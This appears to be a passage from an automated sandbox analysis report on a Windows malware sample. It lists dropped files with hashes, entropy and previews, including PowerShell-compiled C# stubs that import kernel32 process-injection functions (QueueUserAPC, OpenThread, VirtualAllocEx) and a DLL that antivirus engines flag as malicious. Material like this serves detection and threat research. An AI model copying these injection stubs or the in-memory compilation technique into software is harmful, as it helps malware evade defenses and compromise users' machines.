Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class tba. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr muapoay,IntPtr ownmggmyjwj,IntPtr blggfu);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint uxd,uint egqs,IntPtr yobweqmfam);.. }..}.

C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	369
Entropy (8bit):	5.2685350696131525
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fwHiRwzxs7+AEszIwkn23fwHiR7GAn:p37Lvkmb6KRfYHiRwWZEifYHiR7x
MD5:	0B11F29185DB421C00903F45FE024AE2
SHA1:	DFF6A6F691D759E5F9B2235BDC4312CC813D126D
SHA-256:	A3B0D0B7F39D2C021C2075344B7AE6224CBB622B8EF23AF17EAE1AF6419ADC5A
SHA-512:	5290245920DB66BFBBE492764FD676D0478941635F478F5E662E239788DED63B0CCF360E1CCA2DAD0B7BBECD3F21C3540851F951671B2B62402A9C0E24EA4CED
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.0.cs"

C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.6131948792968713
Encrypted:	false
SSDEEP:	24:etGSK/W2Dg85xL/XsB4z27L4zqhRqPPtkZfsFKfn+II+ycuZhN+/akSx4PNnq:6fWb5xL/OLbbuuJsFKPn1ulWa3Cq
MD5:	CDE35CA5287C4F9E965411C0392061FD
SHA1:	ADB2B06B3A662D8F7672F04CE1CCB53C14495DCC
SHA-256:	719B17E1FA8033BC84E9A4C24B4BB5D7FF2A6319CA17CE85B40BD9E1EEA785D8
SHA-512:	82EC4B2C1BB291EDF2F2EB87C0B8CD19A6AAE423FC3C0E1D7EE10B93C9B0B2024961763D8F2869F325183E1DC7006273295173C8AB908DF23D00EF9FCD97E2DE
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._...........!.................#... ...@....... ....................................@..................................#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....BSJB............v4.0.30319......l...H...#~......8...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...................................................... 6............ C............ V.....P ......a.........g.....o.....{.....................a. ...a...!.a.%...a............3./.....6.......C.......V................................................<Module>.5b2bnkld.dll.tba.W32.mscorlib.Syst

C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.out Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	412
Entropy (8bit):	4.871364761010112
Encrypted:	false
SSDEEP:	12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
MD5:	83B3C9D9190CE2C57B83EEE13A9719DF
SHA1:	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
SHA-256:	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
SHA-512:	0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
Malicious:	false
Preview:	Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\5b2bnkld\CSC18B8FCEB9D646308CD119582578A238.TMP Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.1029347611044296
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryw/ak7Ynqqx4PN5Dlq5J:+RI+ycuZhN+/akSx4PNnqX
MD5:	37B56DB5457D9352C7F283016DF87B68
SHA1:	A200E669F621C0048D0C9D56DD9CF2F75B023662
SHA-256:	00CE7C8C5DECB076018E1F83D75BC20D60EB98D0F0BAFD79A39D0F1054FE70E2
SHA-512:	319CEA659A5835979F55F4F151B7011BAD3C247F111B01E19941DF4A7EDC65993DEE972FA7276B2D45CDF7CA086E5185D96F9FB350CAFD1C12537B115BCA0E24
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...5.b.2.b.n.k.l.d...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...5.b.2.b.n.k.l.d...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\Bonaparte.zip Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	41938
Entropy (8bit):	7.989242204320437
Encrypted:	false
SSDEEP:	768:gAmgadYntvl1KeeHgh7gfGUeVRn5XotJMhv5Mmg0imtI9v0IN7l:g7uTCCEMakKmhIM2
MD5:	C88641703830B3DF0E04A2CF3B9497ED
SHA1:	F46E2FE6F66C94DBB6A2D31F7E3D63586B2A0B71
SHA-256:	B138293D0EA58C51021F2BA5355D8215323189AAFB486B62315513C41B39E1F0
SHA-512:	A67053E99FF0F06F3575191A4A9B4976832DE7D7EFB3E9652935E32130830E6EEF340BF044477DC061E49D588960D2792B3A93CDACA1E329E8012228845DD96D
Malicious:	true
Preview:	PK........j.tQR.N.............marginal.roq..TS].0L...A....tA....T!.AD@.."%....:..J..H..D)..n.E.wB.w...e.../k.....^.{.....M.i.ECKCC.@...Rih.......?^....9@S...[E.A...v.wxb.`.........C..g;.k;.%.[<...?...r./...44...4R.....7As.....IC.&U.n......k....4..-^.}_..-.....o....>r}44.....44........sz............1.37q2...e.o.T.@......M....GO...:.V..S..r.FO...G.\|..0..S'. ;.p..t....f......3..q....N.GsK_..."X.....0.`....F-..T.Z..q(..y..F..<.......z.O......G.F.....a...9.y_.&,......;......`.V..}.........a<..2gr..cg....S.E.....rWTN..wP...x.2...s........ID......k.,t...'.....]#..QZ.....['...P...\].&...Rk1.]..{....... ....4...#g}kc.E...)~H.n......d.O.gl...........@R....@N...>...&G.....%.d...pcv`....j.V.._..VS..j.+.N....+.`.F(&-..S.+*..7U.P.?:..3..=).........x.....6.. ..x...._t.........?....C...FW......R\|.J......D.<~..1.A...u.Rx#.j........Oy G...x.....}.S..?.S...p..L.>R>.....B....Q...?z..d:......KI,......8.3........e....G..W..f .wf.D.`..2.8YZ...OX....m..?..E.

C:\Users\user\AppData\Local\Temp\Hettie.jpeg Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	38
Entropy (8bit):	4.807009421281392
Encrypted:	false
SSDEEP:	3:Nv6nZ+KE8cOjG:Nv6Z+Kg
MD5:	32E2B9D667BCFB4FDFDF0D054EAC8755
SHA1:	2AB5BB87549657D68E3FDD4B159972FAA26FF752
SHA-256:	46BEB9B153848A5A6506AC907E35CFA8771AACDA08DCDAFA38A351C053394E96
SHA-512:	531098616D3E159CFD0A833ED88CABA2C15F124F5CA155AAE0E5D12747EE9B9E2A916E4CC88A804EE8F51E0F8888F368425B80A30DCA35F79FB0FC3B3B83B90F
Malicious:	false
Preview:	iIFNJmSCDlBhMcCeQbfSIOjtxZUzZYWjkFdZfq

C:\Users\user\AppData\Local\Temp\JavaDeployReg.log Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	89
Entropy (8bit):	4.242855375782486
Encrypted:	false
SSDEEP:	3:oVXVPWOfUuUIIi8JOGXnFPWOfUuUIINLX+n:o9IO8WqYO89u
MD5:	0C16B14B295FA31635B2CF0D5608C6CF
SHA1:	42E59548F86E0A6E14852FE1054DF70FBBFAA634
SHA-256:	624F55C5EE27550C4A9DB0730268EFB7C344328503B83CABDE307FBDFC1DB8A6
SHA-512:	1C836340CC9ECE69ED474AB13C87434763388A2591E3348B364B56598E539B638B3DEC0645F92575685414C9DD487C41B7BBCBF37BF2BBCDD3F966D36D7A44E9
Malicious:	false
Preview:	[2020/11/23 12:19:18.230] Latest deploy version: ..[2020/11/23 12:19:18.230] 11.211.2 ..

C:\Users\user\AppData\Local\Temp\RES16AC.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	data
Category:	dropped
Size (bytes):	2184
Entropy (8bit):	2.7054796719836367
Encrypted:	false
SSDEEP:	24:p+fk/DfHehKdNNI+ycuZhNwakS8PNnq9qpee9Ep:ckrUKd31ulwa3sq9J
MD5:	1B9AFA76FC15BF543147D557EE80F010
SHA1:	B7DD435D5295FED0DC2D8F10CFD253B38B76F527
SHA-256:	5BDD2A24E013CBCFDCB38BA23F2126F69052DA3E4A0BF5BF352072B39F72100C
SHA-512:	E143E970FC5FF10CF3523C6B6775B1B380DB5160252CD02D353EBFA0D172EBB66D49DD92DE1384F5CC506DA2E2B9110C10261DA05668EC4989E230B18083CAF7
Malicious:	false
Preview:	........T....c:\Users\user\AppData\Local\Temp\ztp4fhzn\CSC901590E0DE33494E82C695FA40AE49BE.TMP................'@-.j...O....)H..........4.......C:\Users\user\AppData\Local\Temp\RES16AC.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\RES269.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	data
Category:	dropped
Size (bytes):	2184
Entropy (8bit):	2.703220305924983
Encrypted:	false
SSDEEP:	24:bZfqiG0snfHghKdNfI+ycuZhN+/akSx4PNnq9qpJ6e9Ep:bBqiVsfiKd91ulWa3Cq9T
MD5:	621B3DC6A58CB8EBF6602E924A0D27CE
SHA1:	2801A81290D7389CBD078852A82DA94F093CDF00
SHA-256:	25E75007CCFC26B2C838A1A8C05D87CED9AF9475A9B0097B39F0B2DA2AD94C24
SHA-512:	BF3985DFF0C6E52A794CA9ECA0D36629B32895A31774B4BD646A12E79C2195522D191739B058E326523F20DF3A4A803F0E00ED5A2209CC069A5B54E236A05842
Malicious:	false
Preview:	........S....c:\Users\user\AppData\Local\Temp\5b2bnkld\CSC18B8FCEB9D646308CD119582578A238.TMP................7.m.E}.R...m.{h..........3.......C:\Users\user\AppData\Local\Temp\RES269.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nqjlg1ip.3rs.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v3uhcgdk.pa4.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\adobe.url Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<https://adobe.com/>), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	108
Entropy (8bit):	4.699454908123665
Encrypted:	false
SSDEEP:	3:J25YdimVVG/VClAWPUyxAbABGQEZapfpgtovn:J254vVG/4xPpuFJQxHvn
MD5:	99D9EE4F5137B94435D9BF49726E3D7B
SHA1:	4AE65CB58C311B5D5D963334F1C30B0BD84AFC03
SHA-256:	F5BC6CF90B739E9C70B6EA13F5445B270D8F5906E199270E22A2F685D989211E
SHA-512:	7B8A65FE6574A80E26E4D7767610596FEEA1B5225C3E8C7E105C6AC83F5312399EDB4E3798C3AF4151BCA8EF84E3D07D1ED1C5440C8B66B2B8041408F0F2E4F0
Malicious:	false
Preview:	[{000214A0-0000-0000-C000-000000000046}]..Prop3=19,11..[InternetShortcut]..IDList=..URL=https://adobe.com/..

C:\Users\user\AppData\Local\Temp\hemp.mp4 Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	21
Entropy (8bit):	4.201841232302569
Encrypted:	false
SSDEEP:	3:aTQDBrppxBn:eAF
MD5:	BAFCF6766D3A528987DA71E786B3211E
SHA1:	42061CFFE74471DE81D6E0F9C2AB09C396F1EE96
SHA-256:	B79049E087BD746D519AEBC12B42B0213CE5220D5252076AB9AB2CD988B0BB76
SHA-512:	1AC783355FD08DFFF52B0A126E323908C7C5BFDC5D6907108ACA1B78F4D7168156852C3548896C6BB05BAEFA1F02AC4695BA222C6C485B0B8B8983ABE4485481
Malicious:	false
Preview:	hcYRMguufkKzEvALiMSsd

C:\Users\user\AppData\Local\Temp\marginal.roq Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	48128
Entropy (8bit):	7.669222450158645
Encrypted:	false
SSDEEP:	768:g3onFH7sWxJPhIsa5n5XotJMhv5Mmg0imbr6W:2oBwsmakKmh6W
MD5:	BA1A42AFC59951D161F62B6840D32D3D
SHA1:	EC7C3F94392C42762C8824D4EC899463F49C3756
SHA-256:	7B3B1C04013211B4E056D58004D62DC688F640D802596A69C0E10849FEE95BDD
SHA-512:	688EEC7892FE603C0DF6F8A2207CDF4A9EA3D9E922B309ACB1B6538C266680C3DF972250DDFABB03160F47F68369FF162D5BBDFFAC2BB3FCE94FF6BEA1789E14
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 69%
Preview:	MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode...$........PE..L...8p._...........!...I..................... ....@.................................H1....@.................................@...X....................................................................................................................text............................... ..`.data........ ......................@....reloc..............................@..B................U..}..u..*.............}..u.1....}..u.1....}..u.1.....SWV..v.h.............^_[.1.H)...v.u..j@h.0..h@...j.....@.Sh@...h. @.P......U..`.}..u..M..U..0......a.........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\reactionary.thm Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	70
Entropy (8bit):	5.091723152900814
Encrypted:	false
SSDEEP:	3:uikdpKz4dutoA+p/h03n:uNvd1NrO
MD5:	6C3B412B4826477EC990E994DEAE1B14
SHA1:	91BBB9F31680A6AA62FADC94E85103FC97506699
SHA-256:	056F5C6328282782230B1096965CE229E5D7B9A27BEE62ABD11F9E487A98721B
SHA-512:	D9FAA251A8AC338F098B83CBECCB369C74739DE3B1BB779343874E1A4245870FF8A6268EA138E5DE6F3272C49E5E1E2B1FA9F48037D5AF71C496A010A3187FCA
Malicious:	false
Preview:	IjebRqKdWLOYanJbVFtMKQIwYTSuiTMsZtBOnbvGjeIjOiaVuAEWzOmGOyqdZqLXUYbDQR

C:\Users\user\AppData\Local\Temp\ztp4fhzn\CSC901590E0DE33494E82C695FA40AE49BE.TMP Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.098274781959774
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry+ak7Ynqq8PN5Dlq5J:+RI+ycuZhNwakS8PNnqX
MD5:	CB27402D1C6ABBCE144FDB0CD4EF2948
SHA1:	9A5AAE79EF9B19645DDB1DE161ACBF0ECD50CF29
SHA-256:	5073BCE2D884173E0A85387183E4354DD6EB80EF56351FF88A545D3C2022454E
SHA-512:	0F946636E1B3F5548FF0FCFA9BDD16948FF2AD04CD9F8D4D6FD9C2A29358CF127D8901A55D13C7D175BDA537A3DFCB644CA0553235AD4B3C80675D6D343ABD7D
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...z.t.p.4.f.h.z.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...z.t.p.4.f.h.z.n...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	414
Entropy (8bit):	5.000775845755204
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJ0VMRSRa+eNMjSSRr5DyBSRHq10iwHRfKFKDDVWQy:V/DTLDfue9eg5r5Xu0zH5rgQy
MD5:	216105852331C904BA5D540DE538DD4E
SHA1:	EE80274EBF645987E942277F7E0DE23B51011752
SHA-256:	408944434D89B94CE4EB33DD507CA4E0283419FA39E016A5E26F2C827825DDCC
SHA-512:	602208E375BCD655A21B2FC471C44892E26CA5BE9208B7C8EB431E27D3AAE5079A98DFFE3884A7FF9E46B24FFFC0F696CD468F09E57008A5EB5E8C4C93410B41
Malicious:	true
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class mme. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint bxtqajkpwb,uint ytemv);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr nlosdxjodm,IntPtr mvqodpevph,uint tnvcegcf,uint dbt,uint egycoak);.. }..}.

C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	369
Entropy (8bit):	5.249164487663631
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fkzxs7+AEszIwkn23fh:p37Lvkmb6KRfcWZEif5
MD5:	19E6C58CD10622C223144C18D9BD35AD
SHA1:	352924FA43AC485C669CD7E54A008CDB708272F8
SHA-256:	13C633BCAE4EEADC8CA432DB095A694CFAC931E8A1B5C942905BBE43F90112B4
SHA-512:	A397EB4BF7961B5E0FB7A56233084ED35AF540639AE48353EBD37DC8AE48F49DE6403C37B68C2FA036EB17C486014AEC178BEBB3DB55D6F0D0BAEBC25A9B7291
Malicious:	false
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.0.cs"

C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.6342807860034836
Encrypted:	false
SSDEEP:	24:etGSCmM+WEei8MTx2qHtLUyBrfEOdWtGYwxhtkZfGdw7I+ycuZhNwakS8PNnq:6H7qMTxzJUyN8wWQYwSJGU1ulwa3sq
MD5:	A54DA3260FC8514F5DAC73481A8DA701
SHA1:	B3C3F2FC1BB943F736D8CA75C3E5DAD8C91053E1
SHA-256:	FECAE1DD2E993B609DE878972C0A0B221B449BFE75169E1BE288041D5325CBD8
SHA-512:	03B5B691606FE01A32F3C8503F6E3DE9C9D0EEF1AE14903F73AF147BEBAB5CF3B855C9F88CD06597E4B69E188C3C8FC8D473F965C32F98C40F92B1026A288DA4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...P...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...............'...................................... 6............ H............ P.....P ......_.........e.....p.....v..........................._.!..._...!._.&..._.......+.....4.:.....6.......H.......P..................................................<Module>.ztp4fhzn.dll.mme.W32.mscor

C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.out Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	412
Entropy (8bit):	4.871364761010112
Encrypted:	false
SSDEEP:	12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
MD5:	83B3C9D9190CE2C57B83EEE13A9719DF
SHA1:	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
SHA-256:	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
SHA-512:	0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
Malicious:	false
Preview:	Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\~DF135B9A8EB736BB66.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40217
Entropy (8bit):	0.6817838832405612
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+PxzaBAIxZidqIxZidNIxZid+:kBqoxKAuqR+PxzaBAIfidqIfidNIfid+
MD5:	9CC706710702B84C06553BA57F390C7F
SHA1:	AED5AAA95744981B18B99676823B0CEACCEDF11D
SHA-256:	B2A1D1E9BB463F0E38265F734C87D1607AE222B1108CE9DBCE9DB76E5B0F7E1E
SHA-512:	FCF9F93D1E725ED260FEC899BA0574CBB2149AF309D8C8D450D1DD722157736EEF5303E9F39DD003836EBDBC920265CC684B2700B7A68D2972F9BFE4A8E480A0
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF6A31E5743615C572.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40097
Entropy (8bit):	0.6616799121677559
Encrypted:	false
SSDEEP:	384:kBqoxKAuqR+RMRqRwRRRaRLDquORDquOGDquOD:TOzOOOD
MD5:	7C779D1260CB993D38A34A8088F3C1C0
SHA1:	729615B377B51EDF7988DB881A2E2FDA56C6B589
SHA-256:	9B976D794ADC110663D49510BCB748486DD5593E2CF5691DF97C6AADB00825A5
SHA-512:	D958904C0F519BCD35E9818E2CC0E4416EB1B23E72BF2CCEE3E1A773FF25CA50362E6C22411F89FAC81FDE0D54BC20DF3AC3C7EF963D9D65E030B848161AA723
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFCF3528861E95EDFF.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40225
Entropy (8bit):	0.6850646467025453
Encrypted:	false
SSDEEP:	192:kBqoxKAuqR+a8mv85cQPtrYxccQPtrYxzcQPtrYxc:kBqoxKAuqR+a8mv85TG+TG1TG2
MD5:	2D4FFE2929BF72627AB91C46A7CA726B
SHA1:	CE64983337FEBC66521F426DFAABBBEB5E9CB6C4
SHA-256:	D3CAE943046FF1F70EDE93347D0246B7ED0CC362C305C0117F565B88BB9C1392
SHA-512:	31AB0ED051FA8376E8A4DB88B3F04D90747AE1F4DA1E307AF81292D93A923C02A0F803CA1C05D5B757A41F4AFC523CD9B22E9C1B7D30A05C700D484EFD83FD98
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFD243D1994B0C4AD0.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	13269
Entropy (8bit):	0.6169692188834844
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9loBa9loBK9lWBNnuOPCPn2PaOPBFGBFDOPG6LOPGr6:kBqoIBFBzBNnp0nQFBFGBFkG6MGr6
MD5:	C635986B886BC083D868596BE7CE04AF
SHA1:	7697F9B81DA572770006C23C364AD4ECB43A5B23
SHA-256:	582418B578765DA8C4621830BEBC34768C4A0A970165517C5C786E82588E5033
SHA-512:	805300C96E16C7C35420CF04EBB2A952650248BC1E04A673F971C6DE8FEA051F494EEEA382CCAC6A9D8271F61CD45C573CEF965CB78CBB9A2F14C6E39431C229
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\{FC666F93-2B96-8EB5-95F0-8FA2992433F6} Download File
Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	54
Entropy (8bit):	4.058116152062723
Encrypted:	false
SSDEEP:	3:8RnuXfUZ9VdHddBWD1UEPv:ynuXo9oDeEX
MD5:	3949EEE2009C71A43575CD33CD1525DF
SHA1:	BA6313E7C1B9A1BAEFDE1FD5B432B6BAE4378B52
